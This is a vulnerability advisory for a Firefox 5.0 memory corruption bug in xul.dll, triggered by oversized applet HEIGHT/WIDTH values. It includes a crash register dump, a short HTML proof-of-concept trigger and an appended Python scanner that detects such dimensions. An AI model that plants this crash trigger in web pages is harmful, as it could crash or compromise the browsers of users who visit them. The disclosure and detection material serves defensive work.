=======================================================================================================
=======================================================================================================
 Mozilla Firefox 5.0 xul.dll (ver. 5.0.0.4183) Memory Corruption

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.altervista.org/

 This was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.

 Tested on:
 Windows 7 Professional

 Info:
 It is possible to corrupt memory by assigning the "HEIGHT" and/or "WIDTH" parameter a value between
 8193 and 9999999.
 Successful exploitation could lead to arbitrary code execution in the context of the current user.
 The error is caused by xul!gfxRect::MoveBy.

 FAULTING_IP: 
 xul!gfxRect::MoveBy+56e9
 6a0a357e 837e0417        cmp     dword ptr [esi+4],17h
 
 which leads here

 .text:1059357E           cmp     dword ptr [esi+4], 17h
 
 and the registers are as follows

 ----------------------------------------------------------------
 Exception C0000005 (ACCESS_VIOLATION reading [00000004])
 ----------------------------------------------------------------
 EAX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 ECX=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
 EDX=060B0CA0: 58 03 CC 6A 01 00 00 00-FF FF FF FF FF FF FF FF
 ESP=001CC9A8: E0 2B 3D 08 64 8E 5E 6A-00 00 00 00 F2 8C 4D 6A
 EBP=05308BC0: 30 93 C7 6A 00 00 00 00-00 00 00 00 00 00 00 00
 ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EDI=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
 EIP=6A5E357E: 83 7E 04 17 75 37 57 56-E8 2E F9 FF FF 59 8D BE
  --> CMP DWORD PTR [ESI+04],+17
 ----------------------------------------------------------------

=======================================================================================================
=======================================================================================================

 Proof of concept:
 
 <html>
  <head>
    <applet codebase="test" height="9134752" width="9134752"></applet>
  </head>
 </html>
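 A defender-side check suggested by the trigger condition above, as an added example that is not part of the advisory: the Python below scans HTML for plug-in elements whose HEIGHT/WIDTH value falls in the 8193..9999999 range, the kind of rule a web proxy or mail gateway could apply while clients are unpatched. The advisory's PoC uses <applet>; extending the scan to <embed> and <object> is an assumption of this example.

```python
import re
from html.parser import HTMLParser

# Inclusive range the advisory names for HEIGHT/WIDTH values that trigger the crash.
CRASH_MIN, CRASH_MAX = 8193, 9999999
# The advisory's PoC uses <applet>; embed/object are added here as an assumption.
WATCHED_TAGS = {"applet", "embed", "object"}
_NUM_RE = re.compile(r"^\s*(\d+)\s*(px)?\s*$", re.IGNORECASE)

def oversized(value):
    """Return the integer if a height/width value is in the crash range, else None.
    Percentages, 'auto' and other non-pixel values are not flagged."""
    m = _NUM_RE.match(value or "")
    if not m:
        return None
    n = int(m.group(1))
    return n if CRASH_MIN <= n <= CRASH_MAX else None

class _DimScanner(HTMLParser):
    """Collects (tag, attribute, value) for oversized dimensions on watched tags."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() not in WATCHED_TAGS:
            return
        for name, value in attrs:  # attrs keep source order; quotes are already stripped
            if name.lower() in ("height", "width"):
                n = oversized(value)
                if n is not None:
                    self.findings.append((tag.lower(), name.lower(), n))

def scan_html(document):
    """Return findings for a whole HTML document (tolerant of unquoted attributes)."""
    scanner = _DimScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.findings

# Constructed sample: the advisory's PoC shape plus benign and edge cases.
SAMPLE = """<html><head><applet codebase = test height = 9134752 width = 9134752></head>
<body><embed src="x.swf" height="8192" width="100%"><object height="8193px"></object>
<img height="9134752"></body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print("suspicious dimension:", finding)  # three findings for SAMPLE
```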
=======================================================================================================
=======================================================================================================